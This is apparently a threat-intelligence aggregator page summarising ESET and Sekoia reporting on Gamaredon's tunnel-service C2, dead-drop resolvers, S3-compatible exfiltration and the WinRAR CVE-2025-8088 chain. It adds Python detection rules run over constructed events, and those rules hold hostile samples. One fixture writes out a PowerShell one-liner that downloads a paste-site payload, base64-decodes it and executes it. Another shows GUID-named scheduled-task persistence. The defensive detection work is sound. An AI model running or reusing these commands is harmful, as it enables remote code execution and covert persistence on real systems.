ctipilot.ch

ESET Gamaredon 2025 annual paper — tunnels/Workers/dead-drops, S3-compatible exfil, Turla collab

annual-report · annual-report:eset-gamaredon-2025

Coverage timeline: 1 · first 2026-06-26 → last 2026-06-26
Briefs: 1 · 1 distinct
Sources cited: 14 · 7 hosts
Sections touched: 1 · research
Co-occurring entities: 8

Story timeline

  1. 2026-06-26 · CTI Daily Brief — 2026-06-26
     research · PD-9 annual report; six new Ptero* tools; tunnel-service C2; rclone→Wasabi/Tebi/Intercolo exfil; exclusively Ukrainian targeting

Where this entity is cited

  • research: 1

Source distribution

  • attack.mitre.org: 7 (50%)
  • thehackernews.com: 2 (14%)
  • blog.sekoia.io: 1 (7%)
  • infosecurity-magazine.com: 1 (7%)
  • sekoia.com: 1 (7%)
  • welivesecurity.com: 1 (7%)
  • microsoft.com: 1 (7%)


Items in briefs about ESET Gamaredon 2025 annual paper — tunnels/Workers/dead-drops, S3-compatible exfil, Turla collab (5)

ESET's 2025 Gamaredon paper: exfil and C2 moved wholesale onto trusted cloud services (ANNUAL REPORT)

From CTI Daily Brief — 2026-06-26 · published 2026-06-26

ESET's annual Gamaredon paper documents the FSB-linked group's 2025 toolset — six new PowerShell tools (PteroDee, PteroCache, PteroDum, PteroOdd, PteroEffigy, PteroPaste) plus a resurrected PteroSetup VBScript weaponizer — and, more usefully for defenders elsewhere, a wholesale shift of infrastructure onto trusted services (ESET, 2026-06-25). C2 now rides Cloudflare tunnels (trycloudflare.com), Cloudflare Workers (workers.dev), Microsoft DevTunnels (devtunnels.ms), Loophole, No-IP DDNS, Clever Cloud and Supabase; data is exfiltrated via rclone to S3-compatible object storage (Wasabi, Tebi, and Intercolo — which became the primary destination by December), and hostnames are brokered through dead-drop resolvers spread across Telegram, Telegra.ph, Dropbox, GoFile, Mastodon and a dozen paste services so no fixed IP or domain appears in the implant. ESET also confirms an early-2025 collaboration with Turla. Sekoia independently documented the same 2025 shift toward tunnel-service C2 and S3-compatible cloud-storage exfiltration in its parallel "FSB's Matryoshka" Gamaredon series (Sekoia, 2026-06-04). Targeting stayed exclusively Ukrainian government and military — the report names no EU targets — so the relevance here is the tradecraft, not the victimology.

Why it matters to us: the tunnel-and-cloud-storage model defeats domain/IP blocklists and blends with legitimate egress, and it is exactly the pattern any espionage operator can adopt. Detection concepts: alert on tunnel-service egress (trycloudflare.com / workers.dev / devtunnels.ms) initiated by Office or scripting processes; flag rclone or S3-API PUT/POST from hosts with no backup role; hunt PowerShell that reads paste-site domains and decodes base64 blobs.
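The three detection concepts above as rule logic over constructed egress/EDR events, as an added example that is not ESET's or Sekoia's code and not part of the original brief. The tunnel-service domains are the ones the report names; the object-storage endpoint suffixes (wasabisys.com, tebi.io), the backup-host allow-list, the paste-site list and the sample events are assumptions to be replaced from your own telemetry.

```python
"""Added example (not from ESET, Sekoia or the brief): the brief's three
detection concepts as rule logic over constructed egress/EDR events.
Tunnel domains come from the report; object-storage suffixes, the backup
host allow-list and the paste-site list are assumptions."""
import re
from typing import Dict, List

TUNNEL_DOMAINS = ("trycloudflare.com", "workers.dev", "devtunnels.ms")   # named in the report
OBJECT_STORAGE = ("wasabisys.com", "tebi.io")          # assumed S3-compatible endpoint suffixes
PASTE_SITES = ("telegra.ph", "pastebin.com")           # assumed dead-drop hosts
OFFICE_OR_SCRIPT = {"winword.exe", "excel.exe", "outlook.exe",
                    "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
BACKUP_HOSTS = {"bkp-srv01"}                           # assumed hosts allowed to run rclone / S3 PUT
B64_DECODE = re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.IGNORECASE)


def _basename(image: str) -> str:
    """Lower-cased file name from a Windows image path."""
    return image.lower().rsplit("\\", 1)[-1]


def domain_matches(host: str, suffixes) -> bool:
    """True when host equals a suffix or is a subdomain of it (no substring matches)."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in suffixes)


def check_event(ev: Dict) -> List[str]:
    """Return the list of detection names that fire for one event."""
    hits: List[str] = []
    img = _basename(ev.get("image", ""))
    dst = ev.get("dst_host", "")
    host = ev.get("host", "")
    cmd = ev.get("cmdline", "")

    # 1. tunnel-service egress initiated by an Office or scripting process
    if img in OFFICE_OR_SCRIPT and domain_matches(dst, TUNNEL_DOMAINS):
        hits.append(f"tunnel_egress:{img}->{dst}")

    # 2. rclone, or any S3-API PUT to object storage, from a host with no backup role
    if host not in BACKUP_HOSTS:
        if img == "rclone.exe":
            hits.append(f"rclone_on_non_backup_host:{host}")
        if ev.get("method") == "PUT" and domain_matches(dst, OBJECT_STORAGE):
            hits.append(f"s3_put_from_non_backup_host:{host}->{dst}")

    # 3. PowerShell that references a paste site and decodes base64
    if img == "powershell.exe" and B64_DECODE.search(cmd) \
            and any(p in cmd.lower() for p in PASTE_SITES):
        hits.append("powershell_pastesite_base64")
    return hits


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"id": "e1", "host": "ws-fin-07", "method": "GET", "dst_host": "abc-def.trycloudflare.com",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"id": "e2", "host": "dev-42", "method": "GET", "dst_host": "myapp.workers.dev",
     "image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"},
    {"id": "e3", "host": "ws-hr-12", "method": "PUT", "dst_host": "s3.wasabisys.com",
     "image": r"C:\Users\j.doe\AppData\Local\Temp\rclone.exe"},
    {"id": "e4", "host": "bkp-srv01", "method": "PUT", "dst_host": "s3.wasabisys.com",
     "image": r"C:\Tools\rclone.exe"},
    {"id": "e5", "host": "ws-fin-07", "method": "GET", "dst_host": "telegra.ph",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "$r=(iwr https://telegra.ph/x-01-01).Content; '
                r'iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r)))"'},
    {"id": "e6", "host": "ws-fin-07", "method": "GET", "dst_host": "",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]


def run(events=SAMPLE_EVENTS) -> Dict[str, List[str]]:
    """Map event id -> detections fired, for the constructed sample set."""
    return {ev["id"]: check_event(ev) for ev in events}


if __name__ == "__main__":
    for event_id, hits in run().items():
        print(event_id, hits or "-")
```

Note the suffix match in `domain_matches`: a plain substring test would also fire on look-alike registrations such as `evil-trycloudflare.com`, and would miss nothing the suffix test catches. The workers.dev developer-host event (e2) is deliberately silent; that service has legitimate users, so the rule keys on the initiating process rather than on the domain alone.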

Gamaredon: GammaPhish → GammaWorm (NTFS ADS + USB) → GammaSteel (S3 exfil) — the week's most complete intrusion kill-chain disclosure [SINGLE-SOURCE Sekoia TDR]

From CTI Weekly Summary — 2026-W23 (1–7 June 2026) · published 2026-06-08

Monday 2 June brought Sekoia's part-one Gamaredon series (Sekoia TDR, 2026-06-01), consolidating three capability clusters under unified naming: GammaPhish (the spearphishing-through-GammaLoad funnel), GammaWorm (the USB-and-network-propagation layer), and GammaSteel (the S3-exfiltration stealer confirmed in the same campaign arc via Sekoia TDR follow-up, daily 2026-06-03).

Initial access (GammaPhish): weaponised xHTML files exploiting CVE-2025-8088 (the WinRAR path-traversal flaw, fixed in 7.13 but still widely unpatched) drop HTA payloads into Windows Startup directories via mshta.exe. Propagation (GammaWorm): a 20,000+-line obfuscated VBScript worm persists via scheduled tasks and Run/RunOnce registry keys, hides components in NTFS Alternate Data Streams, and spreads across USB drives and mapped network shares using Ukrainian-language lures (T1025, T1091). C2 resolves through dead-drop pages on Telegram, Telegra.ph, Teletype.in, Supabase and Cloudflare Workers — all platforms with high allow-list rates at enterprise egress proxies. Exfiltration (GammaSteel): the stealer stages collected data and uploads it directly to attacker-controlled S3-compatible object storage.

The detection pattern across all three stages is highly transferable to non-Ukraine targets. Hunt for: mshta.exe spawning wscript.exe; large obfuscated VBScripts executing from %APPDATA%; scheduled tasks with randomised GUID names pointing into user-profile paths; NTFS ADS on %TEMP%/%APPDATA% files (dir /r, or Sysmon EID 15 FileCreateStreamHash; EID 11 is plain file creation and does not distinguish streams); outbound HTTPS to Telegra.ph / Supabase / Workers from non-developer hosts; and anomalous S3-API calls from user endpoints.

Gamaredon — GammaPhish / GammaWorm / GammaSteel: Russian FSB campaign with USB worm and S3 exfiltration (Sekoia TDR part one) [SINGLE-SOURCE Sekoia TDR]

From CTI Weekly Summary — 2026-W23 (1–7 June 2026) · published 2026-06-08

Sekoia's first part of the Gamaredon series disclosed a January 2026 campaign arc (Sekoia TDR, 2026-06-01; daily 2026-06-02; update daily 2026-06-03). Initial access via CVE-2025-8088 (WinRAR path-traversal, widely unpatched) drops HTA payloads from xHTML attachments. GammaWorm's NTFS-ADS concealment and USB-propagation pattern is the signature detection challenge: the worm body sits in an alternate data stream of an innocuous host file, so ordinary directory listings and file-size checks do not show it (dir /r or Sysmon EID 15 do), and because it copies itself to any mounted drive and mapped share, air-gap-adjacent workstations remain in scope. GammaSteel exfiltrates collected data directly to S3-compatible object storage. Part two of the Sekoia series is outstanding and expected to detail further tooling. Open question: has the campaign reached any EU public-sector estate beyond its primary Ukrainian targets? The USB-propagation vector is exactly the mechanism Luna Moth used this week for physical office intrusion — conceptually distinct actors, coincidentally parallel technique.

UPDATE: Gamaredon weaponises WinRAR CVE-2025-8088 and adds the GammaSteel stealer

From CTI Daily Brief — 2026-06-03 · published 2026-06-03

UPDATE (originally covered 2026-06-02): Sekoia TDR's "FSB's Matryoshka" series adds material technical detail to the Gamaredon (UAC-0010 / ACTINIUM) tooling consolidation covered yesterday: the group is exploiting the WinRAR path-traversal flaw CVE-2025-8088 as an initial-access vector, using the traversal to write payloads directly into %APPDATA%\…\Start Menu\Programs\Startup\ for persistence without a Registry or Scheduled-Task artefact (Sekoia TDR, 2026-06-01).

The series also names GammaSteel, a modular file-stealer (consolidating prior QuietSieve/HarvesterX-class modules) that captures files by extension and — newly — exfiltrates to attacker-controlled S3-compatible cloud storage in addition to Gamaredon's previously documented HTTP/Telegram channels (The Hacker News, 2026-06-02). The full chain runs WinRAR archive → GammaPhish (HTA) → GammaLoad (VBScript downloader) → GammaWorm/GammaSteel.

Delta for defenders: CVE-2025-8088 is fixed in WinRAR 7.13 (August 2025), so the entry vector is closed by patching — inventory WinRAR versions across the estate. Hunt for archive utilities writing .hta, .vbs or executables into Programs\Startup paths (Sysmon EID 11 with a target path containing Programs\Startup), WinRAR spawning wscript.exe/mshta.exe, and VBScript processes making outbound requests to S3 endpoints inconsistent with normal business traffic. The dropped file runs at the next logon under explorer.exe, so explorer.exe launching mshta.exe with a Startup-folder .hta argument is the second place the same chain surfaces. The targeting is Ukraine-centric, but the WinRAR vector reaches any organisation that opens archive-format lures.
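An added example, not Sekoia's or the brief's code: a WinRAR patch-level check against the 7.13 fix named above, plus the three Startup-drop hunts run over constructed Sysmon-style records (EID 11 FileCreate, EID 1 ProcessCreate, EID 3 NetworkConnect). The archiver list, the object-storage endpoint suffixes, the dropped-extension list and the sample events are assumptions.

```python
"""Added example (not Sekoia's or the brief's code): a WinRAR patch-level
check against the 7.13 fix, plus the three Startup-drop hunts over
constructed Sysmon-style records (EID 11 FileCreate, EID 1 ProcessCreate,
EID 3 NetworkConnect). Archiver list, endpoint suffixes and events are assumptions."""
import re
from typing import Dict, List, Optional, Tuple

FIXED_VERSION = (7, 13)   # CVE-2025-8088 fixed in WinRAR 7.13 (per the brief)
ARCHIVERS = {"winrar.exe", "rar.exe", "unrar.exe"}            # assumed list; extend as needed
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
S3_SUFFIXES = ("amazonaws.com", "wasabisys.com", "tebi.io")  # assumed S3 / S3-compatible endpoints
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
DROPPED_EXT = (".hta", ".vbs", ".exe", ".lnk", ".cmd", ".bat", ".ps1")  # assumed payload types


def parse_version(text: str) -> Optional[Tuple[int, int]]:
    """'7.12' or 'WinRAR 6.24 (64-bit)' -> (major, minor); None when fewer than two numbers."""
    nums = re.findall(r"\d+", text)
    return (int(nums[0]), int(nums[1])) if len(nums) >= 2 else None


def is_winrar_vulnerable(version: str) -> bool:
    """True for any build older than the fixed release."""
    v = parse_version(version)
    if v is None:
        raise ValueError(f"unparseable WinRAR version: {version!r}")
    return v < FIXED_VERSION


def _basename(p: str) -> str:
    return p.lower().rsplit("\\", 1)[-1]


def _matches(host: str, suffixes) -> bool:
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in suffixes)


def hunt(events: List[Dict]) -> List[Tuple[str, str]]:
    """Return (event id, reason) for every record matching one of the three hunts."""
    found: List[Tuple[str, str]] = []
    for ev in events:
        img = _basename(ev.get("Image", ""))
        if ev["EventID"] == 11:
            # archive utility writing a payload-type file into the Startup folder
            target = ev.get("TargetFilename", "")
            if img in ARCHIVERS and STARTUP_RE.search(target) and target.lower().endswith(DROPPED_EXT):
                found.append((ev["id"], "archiver wrote payload into Programs\\Startup"))
        elif ev["EventID"] == 1:
            # archive utility directly spawning a script host
            if _basename(ev.get("ParentImage", "")) in ARCHIVERS and img in SCRIPT_HOSTS:
                found.append((ev["id"], "archiver spawned script host"))
        elif ev["EventID"] == 3:
            # script host talking to an S3 / S3-compatible endpoint
            if img in SCRIPT_HOSTS and _matches(ev.get("DestinationHostname", ""), S3_SUFFIXES):
                found.append((ev["id"], "script host connected to object storage"))
    return found


SAMPLE_EVENTS = [  # constructed records, not real logs
    {"id": "s1", "EventID": 11, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\j.doe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.hta"},
    {"id": "s2", "EventID": 11, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\j.doe\Downloads\report\report.pdf"},
    {"id": "s3", "EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\WinRAR\WinRAR.exe"},
    {"id": "s4", "EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},   # logon-time Startup execution: covered by a separate hunt
    {"id": "s5", "EventID": 3, "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationHostname": "s3.tebi.io"},
    {"id": "s6", "EventID": 3, "Image": r"C:\Program Files\BackupAgent\agent.exe",  # assumed benign agent
     "DestinationHostname": "s3.amazonaws.com"},
]


if __name__ == "__main__":
    for v in ("6.24", "7.12", "7.13", "7.20"):
        print(v, "vulnerable" if is_winrar_vulnerable(v) else "patched")
    for event_id, reason in hunt(SAMPLE_EVENTS):
        print(event_id, reason)
```

Feed `is_winrar_vulnerable` the DisplayVersion strings from your software inventory; the parser ignores trailing build qualifiers such as "(64-bit)". The explorer.exe → mshta.exe record (s4) is intentionally not matched here, since that is the logon-time execution of the dropped file rather than the drop itself.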

Sekoia consolidates Gamaredon tooling under GammaPhish / GammaWorm, details an NTFS-ADS USB+network worm

From CTI Daily Brief — 2026-06-02 · published 2026-06-02

Sekoia's Threat Detection & Research team published part one of a Gamaredon (UAC-0010 / ACTINIUM, attributed to Russia's FSB) series describing a January 2026 campaign against Ukrainian government and military targets, introducing unified naming for two capability clusters: GammaPhish (the funnel from spearphishing through GammaLoad deployment) and GammaWorm (the propagation layer, subsuming the tooling previously tracked as LitterDrifter / PteroLNK) (Sekoia TDR, 2026-06-01 · Infosecurity Magazine, 2026-06-01). The chain begins with weaponised xHTML files exploiting CVE-2025-8088 (the WinRAR path-traversal flaw) to drop HTA payloads into Windows Startup directories via mshta.exe. GammaWorm itself is a 20,000+-line obfuscated VBScript worm that persists via scheduled tasks and RunOnce/Run registry keys, hides components in NTFS Alternate Data Streams, propagates across USB and mapped network drives using Ukrainian-language lures, and resolves C2 through dead-drop resolvers on Telegram, Telegra.ph, Teletype.in, Supabase and Cloudflare Workers.

Why it matters to us: The ADS-hiding + removable-media propagation + legitimate-service dead-drop pattern is highly transferable to any EU public-sector estate. Hunt for mshta.exe spawning wscript.exe, large obfuscated VBScripts executing from %APPDATA%, scheduled tasks with randomised GUID names pointing into user-profile paths, ADS on %TEMP%/%APPDATA% files, and outbound HTTPS to Telegra.ph / Supabase / Workers endpoints from non-developer hosts.
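The four host-side hunts listed here and in the weekly item above (mshta spawning a script host, a large VBScript running from AppData, GUID-named scheduled tasks pointing into user-profile paths, ADS on Temp/AppData files) run over constructed Sysmon-style records, as an added example that is not Sekoia's detection content. Field names follow Sysmon's ProcessCreate (EID 1) and FileCreateStreamHash (EID 15) schema; the `ScriptSize` enrichment field, the size threshold, the GUID task name and the sample events are assumptions. Zone.Identifier streams are excluded because browsers and mail clients write that mark-of-the-web stream on every download.

```python
"""Added example (not Sekoia's detection content): the four host-side hunts
from the brief over constructed Sysmon-style records. EID 1 = ProcessCreate,
EID 15 = FileCreateStreamHash. ScriptSize is an assumed enrichment field
(Sysmon itself does not record file size); threshold and events are assumptions."""
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LARGE_SCRIPT_BYTES = 500_000                  # assumed threshold; the worm is 20,000+ lines
BENIGN_STREAMS = {"zone.identifier"}          # mark-of-the-web, written on every download
GUID_RE = re.compile(r"^\{?[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?$", re.I)
TASK_NAME_RE = re.compile(r'/tn\s+"?([^"\s]+)', re.I)
TASK_RUN_RE = re.compile(r'/tr\s+"?([^"]+)', re.I)
USER_PROFILE_RE = re.compile(r"\\users\\[^\\]+\\(appdata|temp)\\", re.I)
APPDATA_VBS_RE = re.compile(r"\\appdata\\.*\.vbs\b", re.I)
ADS_RE = re.compile(r"^(?P<file>[a-z]:\\.+?):(?P<stream>[^:\\]+)$", re.I)
TEMP_OR_APPDATA_RE = re.compile(r"\\(temp|appdata)\\", re.I)


def _basename(p: str) -> str:
    return p.lower().rsplit("\\", 1)[-1]


def hunt(events: List[Dict]) -> List[Tuple[str, str]]:
    """Return (event id, reason) for each hunt that fires; one record can fire several."""
    found: List[Tuple[str, str]] = []
    for ev in events:
        img = _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if ev["EventID"] == 1:
            # 1. mshta.exe spawning a script host
            if _basename(ev.get("ParentImage", "")) == "mshta.exe" and img in SCRIPT_HOSTS:
                found.append((ev["id"], "mshta spawned script host"))
            # 2. large VBScript executing from %APPDATA%
            if img in SCRIPT_HOSTS and APPDATA_VBS_RE.search(cmd) \
                    and ev.get("ScriptSize", 0) >= LARGE_SCRIPT_BYTES:
                found.append((ev["id"], "large VBScript from AppData"))
            # 3. schtasks creating a GUID-named task whose action points into a user profile
            if img == "schtasks.exe" and "/create" in cmd.lower():
                name = TASK_NAME_RE.search(cmd)
                action = TASK_RUN_RE.search(cmd)
                if name and GUID_RE.match(name.group(1)) and action \
                        and USER_PROFILE_RE.search(action.group(1)):
                    found.append((ev["id"], f"GUID-named task {name.group(1)} into user profile"))
        elif ev["EventID"] == 15:
            # 4. alternate data stream created on a file under Temp/AppData, ignoring mark-of-the-web
            m = ADS_RE.match(ev.get("TargetFilename", ""))
            if m and m.group("stream").lower() not in BENIGN_STREAMS \
                    and TEMP_OR_APPDATA_RE.search(m.group("file")):
                found.append((ev["id"], f"ADS {m.group('stream')} on {m.group('file')}"))
    return found


SAMPLE_EVENTS = [  # constructed records, not real logs
    {"id": "h1", "EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "ScriptSize": 1_300_000,
     "CommandLine": r'"C:\Windows\System32\wscript.exe" //e:vbscript C:\Users\j.doe\AppData\Roaming\svc\core.vbs'},
    {"id": "h2", "EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'schtasks /create /tn {4f2a9c1e-7b3d-4e5a-9c1f-2a3b4c5d6e7f} '
                    r'/tr "wscript.exe C:\Users\j.doe\AppData\Roaming\svc\core.vbs" /sc minute /mo 5'},
    {"id": "h3", "EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'schtasks /create /tn "Adobe Acrobat Update Task" '
                    r'/tr "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /sc daily'},
    {"id": "h4", "EventID": 15,
     "TargetFilename": r"C:\Users\j.doe\AppData\Local\Temp\readme.txt:payload.vbs"},
    {"id": "h5", "EventID": 15,
     "TargetFilename": r"C:\Users\j.doe\Downloads\invoice.zip:Zone.Identifier"},
    {"id": "h6", "EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ScriptSize": 2_000,
     "CommandLine": r"wscript.exe C:\Users\j.doe\AppData\Roaming\svc\core.vbs"},
]


if __name__ == "__main__":
    for event_id, reason in hunt(SAMPLE_EVENTS):
        print(event_id, reason)
```

The schtasks parse is deliberately narrow (`/tn` and `/tr` from the command line); tasks registered through the Task Scheduler API never pass through schtasks.exe, so pair this with a periodic sweep of `%SystemRoot%\System32\Tasks` for GUID-named task XML whose action path sits under a user profile. Record h6 is the same script started at logon by explorer.exe with a small size, and fires nothing: the size threshold is what separates the 20,000-line worm from ordinary logon scripts.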